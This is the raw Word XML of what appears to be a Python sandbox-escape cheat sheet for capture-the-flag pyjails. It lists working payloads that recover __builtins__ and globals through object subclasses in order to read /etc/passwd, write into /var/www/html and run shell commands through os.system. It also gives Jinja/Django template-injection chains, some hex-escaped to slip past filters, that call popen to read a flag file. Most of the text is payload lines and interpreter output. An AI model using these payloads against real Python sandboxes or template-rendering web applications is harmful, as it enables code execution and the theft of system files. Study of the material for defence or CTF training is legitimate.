    <w:p w14:paraId="2A1217DB" w14:textId="64F11975" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132A0910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#Try to reload __builtins__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAA5423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reload(__builtins__)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776A9013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import __builtin__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E262AD4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2945DFA8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Read recovering &lt;type 'file'&gt; in offset 40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A2054C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().__class__.__bases__[0].__subclasses__()[40]('/etc/passwd').read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB22992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Write recovering &lt;type 'file'&gt; in offset 40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF1B4B6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().__class__.__bases__[0].__subclasses__()[40]('/var/www/html/input', 'w').write('123')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AE688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3BED0F02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Execute recovering __import__ (class 59s is &lt;class 'warnings.catch_warnings'&gt;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1065A542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().__class__.__bases__[0].__subclasses__()[59]()._module.__builtins__['__import__']('os').system('ls')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26818D2D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Execute (another method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5311B3AA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().__class__.__bases__[0].__subclasses__()[59].__init__.__getattribute__("func_globals")['linecache'].__dict__['os'].__dict__['system']('ls')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69266310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Execute recovering eval symbol (class 59 is &lt;class 'warnings.catch_warnings'&gt;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B342A5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().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]["eval"]("__import__('os').system('ls')")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781061A5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277EEF81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Or you could obtain the builtins from a defined function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB6F0EB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get_flag.__globals__['__builtins__']['__import__']("os").system("ls")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44454508" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30761FB2" w14:textId="61656623" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAAB6B2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Obtain builtins from a globally defined function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362FABFF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https://docs.python.org/3/library/functions.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE62D9A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help.__call__.__builtins__ # or __globals__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6270503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license.__call__.__builtins__ # or __globals__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C28E66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credits.__call__.__builtins__ # or __globals__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DDA3EB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print.__self__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE61F13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dir.__self__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0342F84B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globals.__self__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3C074C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lastRenderedPageBreak/>
        <w:t>len.__self__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F0D558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__build_class__.__self__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A353636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066D73A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Obtain the builtins from a defined function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFADD28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get_flag.__globals__['__builtins__']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46031B4D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003B35AA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Get builtins from loaded classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A866251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[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "builtins" in x.__init__.__globals__ ][0]["builtins"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1076BA09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hyperlink r:id="rId16" w:anchor="recursive-search-of-builtins-globals" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Strong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Below there is a bigger function</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> to find tens/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hundreds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> of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places</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> were you can find the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builtins</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CBAFD4" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Python2 and Python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62253992" w14:textId="10E4D39A" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491E82E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Recover __builtins__ and make everything easier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3290FB90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__builtins__= [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0F91C2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__builtins__["__import__"]('os').system('ls')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1357C680" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Builtins payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2966DC44" w14:textId="6AE28B31" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1CE648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Possible payloads once you have found the builtins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BB403B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__builtins__["open"]("/etc/passwd").read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379BFCBD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__builtins__["__import__"]("os").system("ls")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763BA850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There are lots of other payloads that can be abused to execute commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B4F41B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See them below</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E059124" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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6"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Globals and locals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169DEA0C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Checking the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>globals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>locals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a good way to know what you can access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43288B47" w14:textId="5627A852" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0573F01F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&gt;&gt;&gt; globals()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCF9A1F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{'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': &lt;class '_frozen_importlib.BuiltinImporter'&gt;, '__spec__': None, '__annotations__': {}, '__builtins__': &lt;module 'builtins' (built-in)&gt;, 'attr': &lt;module 'attr' from '/usr/local/lib/python3.9/site-packages/attr.py'&gt;, 'a': &lt;class 'importlib.abc.Finder'&gt;, 'b': &lt;class 'importlib.abc.MetaPathFinder'&gt;, 'c': &lt;class 'str'&gt;, '__warningregistry__': {'version': 0, ('MetaPathFinder.find_module() is deprecated since Python 3.4 in favor of MetaPathFinder.find_spec() (available since 3.4)', &lt;class 'DeprecationWarning'&gt;, 1): True}, 'z': &lt;class 'str'&gt;}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76586E53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lastRenderedPageBreak/>
        <w:t>&gt;&gt;&gt; locals()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398D68E7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{'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': &lt;class '_frozen_importlib.BuiltinImporter'&gt;, '__spec__': None, '__annotations__': {}, '__builtins__': &lt;module 'builtins' (built-in)&gt;, 'attr': &lt;module 'attr' from '/usr/local/lib/python3.9/site-packages/attr.py'&gt;, 'a': &lt;class 'importlib.abc.Finder'&gt;, 'b': &lt;class 'importlib.abc.MetaPathFinder'&gt;, 'c': &lt;class 'str'&gt;, '__warningregistry__': {'version': 0, ('MetaPathFinder.find_module() is deprecated since Python 3.4 in favor of MetaPathFinder.find_spec() (available since 3.4)', &lt;class 'DeprecationWarning'&gt;, 1): True}, 'z': &lt;class 'str'&gt;}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FE3E6A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34AD097A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Obtain globals from a defined function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D51642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get_flag.__globals__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667C723D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4F3781A0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Obtain globals from an object of a class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F74AD72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class_obj.__init__.__globals__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2EAB7B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4B7568F2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Obtaining globals directly from loaded classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7247EEE4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[ x for x in ''.__class__.__base__.__subclasses__() if "__globals__" in dir(x) ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA49F02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[&lt;class 'function'&gt;]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6274E511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3984B91C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Obtaining globals from __init__ of loaded classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BE2B48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[ x for x in ''.__class__.__base__.__subclasses__() if "__globals__" in dir(x.__init__) ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218F4745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[&lt;class '_frozen_importlib._ModuleLock'&gt;, &lt;class '_frozen_importlib._DummyModuleLock'&gt;, &lt;class '_frozen_importlib._ModuleLockManager'&gt;, &lt;class '_frozen_importlib.ModuleSpec'&gt;, &lt;class '_frozen_importlib_external.FileLoader'&gt;, &lt;class '_frozen_importlib_external._NamespacePath'&gt;, &lt;class '_frozen_importlib_external._NamespaceLoader'&gt;, &lt;class '_frozen_importlib_external.FileFinder'&gt;, &lt;class 'zipimport.zipimporter'&gt;, &lt;class 'zipimport._ZipImportResourceReader'&gt;, &lt;class 'codecs.IncrementalEncoder'&gt;, &lt;class 'codecs.IncrementalDecoder'&gt;, &lt;class 'codecs.StreamReaderWriter'&gt;, &lt;class 'codecs.StreamRecoder'&gt;, &lt;class 'os._wrap_close'&gt;, &lt;class '_sitebuiltins.Quitter'&gt;, &lt;class '_sitebuiltins._Printer'&gt;, &lt;class 'types.DynamicClassAttribute'&gt;, &lt;class 'types._GeneratorWrapper'&gt;, &lt;class 'warnings.WarningMessage'&gt;, &lt;class 'warnings.catch_warnings'&gt;, &lt;class 'reprlib.Repr'&gt;, &lt;class 'functools.partialmethod'&gt;, &lt;class 'functools.singledispatchmethod'&gt;, &lt;class 'functools.cached_property'&gt;, &lt;class 'contextlib._GeneratorContextManagerBase'&gt;, &lt;class 'contextlib._BaseExitStack'&gt;, &lt;class 'sre_parse.State'&gt;, &lt;class 'sre_parse.SubPattern'&gt;, &lt;class 'sre_parse.Tokenizer'&gt;, &lt;class 're.Scanner'&gt;, &lt;class 'rlcompleter.Completer'&gt;, &lt;class 'dis.Bytecode'&gt;, &lt;class </w:t>
      </w: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lastRenderedPageBreak/>
        <w:t>'string.Template'&gt;, &lt;class 'cmd.Cmd'&gt;, &lt;class 'tokenize.Untokenizer'&gt;, &lt;class 'inspect.BlockFinder'&gt;, &lt;class 'inspect.Parameter'&gt;, &lt;class 'inspect.BoundArguments'&gt;, &lt;class 'inspect.Signature'&gt;, &lt;class 'bdb.Bdb'&gt;, &lt;class 'bdb.Breakpoint'&gt;, &lt;class 'traceback.FrameSummary'&gt;, &lt;class 'traceback.TracebackException'&gt;, &lt;class '__future__._Feature'&gt;, &lt;class 'codeop.Compile'&gt;, &lt;class 'codeop.CommandCompiler'&gt;, &lt;class 'code.InteractiveInterpreter'&gt;, &lt;class 'pprint._safe_key'&gt;, &lt;class 'pprint.PrettyPrinter'&gt;, &lt;class '_weakrefset._IterationGuard'&gt;, &lt;class '_weakrefset.WeakSet'&gt;, &lt;class 'threading._RLock'&gt;, &lt;class 'threading.Condition'&gt;, &lt;class 'threading.Semaphore'&gt;, &lt;class 'threading.Event'&gt;, &lt;class 'threading.Barrier'&gt;, &lt;class 'threading.Thread'&gt;, &lt;class 'subprocess.CompletedProcess'&gt;, &lt;class 'subprocess.Popen'&gt;]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10ADDAF1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Without the use of the dir() function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B4FDDA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[ x for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527B9E23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[&lt;class '_frozen_importlib._ModuleLock'&gt;, &lt;class '_frozen_importlib._DummyModuleLock'&gt;, &lt;class '_frozen_importlib._ModuleLockManager'&gt;, &lt;class '_frozen_importlib.ModuleSpec'&gt;, &lt;class '_frozen_importlib_external.FileLoader'&gt;, &lt;class '_frozen_importlib_external._NamespacePath'&gt;, &lt;class '_frozen_importlib_external._NamespaceLoader'&gt;, &lt;class '_frozen_importlib_external.FileFinder'&gt;, &lt;class 'zipimport.zipimporter'&gt;, &lt;class 'zipimport._ZipImportResourceReader'&gt;, &lt;class 'codecs.IncrementalEncoder'&gt;, &lt;class 'codecs.IncrementalDecoder'&gt;, &lt;class 'codecs.StreamReaderWriter'&gt;, &lt;class 'codecs.StreamRecoder'&gt;, &lt;class 'os._wrap_close'&gt;, &lt;class '_sitebuiltins.Quitter'&gt;, &lt;class '_sitebuiltins._Printer'&gt;, &lt;class 'types.DynamicClassAttribute'&gt;, &lt;class 'types._GeneratorWrapper'&gt;, &lt;class 'warnings.WarningMessage'&gt;, &lt;class 'warnings.catch_warnings'&gt;, &lt;class 'reprlib.Repr'&gt;, &lt;class 'functools.partialmethod'&gt;, &lt;class 'functools.singledispatchmethod'&gt;, &lt;class 'functools.cached_property'&gt;, &lt;class 'contextlib._GeneratorContextManagerBase'&gt;, &lt;class 'contextlib._BaseExitStack'&gt;, &lt;class 'sre_parse.State'&gt;, &lt;class 'sre_parse.SubPattern'&gt;, &lt;class 'sre_parse.Tokenizer'&gt;, &lt;class 're.Scanner'&gt;, &lt;class 'rlcompleter.Completer'&gt;, &lt;class 'dis.Bytecode'&gt;, &lt;class 'string.Template'&gt;, &lt;class 'cmd.Cmd'&gt;, &lt;class 'tokenize.Untokenizer'&gt;, &lt;class 'inspect.BlockFinder'&gt;, &lt;class 'inspect.Parameter'&gt;, &lt;class 'inspect.BoundArguments'&gt;, &lt;class 'inspect.Signature'&gt;, &lt;class 'bdb.Bdb'&gt;, &lt;class 'bdb.Breakpoint'&gt;, &lt;class 'traceback.FrameSummary'&gt;, &lt;class 'traceback.TracebackException'&gt;, &lt;class '__future__._Feature'&gt;, &lt;class 'codeop.Compile'&gt;, &lt;class 'codeop.CommandCompiler'&gt;, &lt;class 'code.InteractiveInterpreter'&gt;, &lt;class 'pprint._safe_key'&gt;, &lt;class </w:t>
      </w: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lastRenderedPageBreak/>
        <w:t>'pprint.PrettyPrinter'&gt;, &lt;class '_weakrefset._IterationGuard'&gt;, &lt;class '_weakrefset.WeakSet'&gt;, &lt;class 'threading._RLock'&gt;, &lt;class 'threading.Condition'&gt;, &lt;class 'threading.Semaphore'&gt;, &lt;class 'threading.Event'&gt;, &lt;class 'threading.Barrier'&gt;, &lt;class 'threading.Thread'&gt;, &lt;class 'subprocess.CompletedProcess'&gt;, &lt;class 'subprocess.Popen'&gt;]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6E8DFD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hyperlink r:id="rId17" w:anchor="recursive-search-of-builtins-globals" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Strong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Below there is a bigger function</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> to find tens/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hundreds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> of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places</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> were you can find the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globals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4A049F" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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6"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Discover Arbitrary Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319FF5D8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Here I want to explain how to easily discover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more dangerous functionalities loaded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> and propose more reliable exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A72E24" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Accessing subclasses with bypasses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A210A5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One of the most sensitive parts of this technique is being able to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access the base subclasses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">. In the previous examples this was done using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>''.__class__.__base__.__subclasses__()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> but there are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other possible ways</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C653D31" w14:textId="716A3F41" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E963EE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#You can access the base from mostly anywhere (in regular conditions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAB8737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"".__class__.__base__.__subclasses__()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056F1616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[].__class__.__base__.__subclasses__()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AEF9F3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{}.__class__.__base__.__subclasses__()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B79C5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().__class__.__base__.__subclasses__()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF5B73C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(1).__class__.__base__.__subclasses__()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5383356A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bool.__class__.__base__.__subclasses__()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA506D3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print.__class__.__base__.__subclasses__()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3503B09C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open.__class__.__base__.__subclasses__()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699B1022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defined_func.__class__.__base__.__subclasses__()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC6E2C8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74F70B37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#You can also access it without "__base__" or "__class__"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447620DC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You can apply the previous technique also here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D776B6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"".__class__.__bases__[0].__subclasses__()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF1CEFB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"".__class__.__mro__[1].__subclasses__()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9E22C4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"".__getattribute__("__class__").mro()[1].__subclasses__()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A890CB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"".__getattribute__("__class__").__base__.__subclasses__()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC7A28C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74B3B6CA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This can be useful in case it is not possible to make calls (therefore using decorators)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D784CBC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lastRenderedPageBreak/>
        <w:t>().__class__.__class__.__subclasses__(().__class__.__class__)[0].register.__builtins__["breakpoint"]() # From https://github.com/salvatore-abello/python-ctf-cheatsheet/tree/main/pyjails#no-builtins-no-mro-single-exec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B248AC1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43EC12BD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#If attr is present you can access everything as a string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5297A39E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This is common in Django (and Jinja) environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6CBEC4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(''|attr('__class__')|attr('__mro__')|attr('__getitem__')(1)|attr('__subclasses__')()|attr('__getitem__')(132)|attr('__init__')|attr('__globals__')|attr('__getitem__')('popen'))('cat+flag.txt').read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDF1AED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(''|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fmro\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')(1)|attr('\x5f\x5fsubclasses\x5f\x5f')()|attr('\x5f\x5fgetitem\x5f\x5f')(132)|attr('\x5f\x5finit\x5f\x5f')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('popen'))('cat+flag.txt').read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2618D901" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Finding dangerous libraries loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2249CC37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For example, knowing that with the library </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>sys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> it's possible to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import arbitrary libraries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, you can search for all the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modules loaded that have imported sys inside of them</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042C0D16" w14:textId="4EADB7A4" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FEB3D3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[ x.__name__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E456D4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['_ModuleLock', '_DummyModuleLock', '_ModuleLockManager', 'ModuleSpec', 'FileLoader', '_NamespacePath', '_NamespaceLoader', 'FileFinder', 'zipimporter', '_ZipImportResourceReader', 'IncrementalEncoder', 'IncrementalDecoder', 'StreamReaderWriter', 'StreamRecoder', '_wrap_close', 'Quitter', '_Printer', 'WarningMessage', 'catch_warnings', '_GeneratorContextManagerBase', '_BaseExitStack', 'Untokenizer', 'FrameSummary', 'TracebackException', 'CompletedProcess', 'Popen', 'finalize', 'NullImporter', '_HackedGetData', '_localized_month', '_localized_day', 'Calendar', 'different_locale', 'SSLObject', 'Request', 'OpenerDirector', 'HTTPPasswordMgr', 'AbstractBasicAuthHandler', 'AbstractDigestAuthHandler', 'URLopener', '_PaddedFile', 'CompressedValue', 'LogRecord', 'PercentStyle', 'Formatter', 'BufferingFormatter', 'Filter', 'Filterer', 'PlaceHolder', 'Manager', 'LoggerAdapter', '_LazyDescr', '_SixMetaPathImporter', 'MimeTypes', 'ConnectionPool', '_LazyDescr', '_SixMetaPathImporter', 'Bytecode', 'BlockFinder', 'Parameter', 'BoundArguments', 'Signature', '_DeprecatedValue', '_ModuleWithDeprecations', 'Scrypt', 'WrappedSocket', 'PyOpenSSLContext', 'ZipInfo', 'LZMACompressor', 'LZMADecompressor', '_SharedFile', '_Tellable', 'ZipFile', 'Path', '_Flavour', '_Selector', 'JSONDecoder', 'Response', 'monkeypatch', 'InstallProgress', 'TextProgress', 'BaseDependency', 'Origin', </w:t>
      </w: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lastRenderedPageBreak/>
        <w:t>'Version', 'Package', '_Framer', '_Unframer', '_Pickler', '_Unpickler', 'NullTranslations']</w:t>
      </w:r>
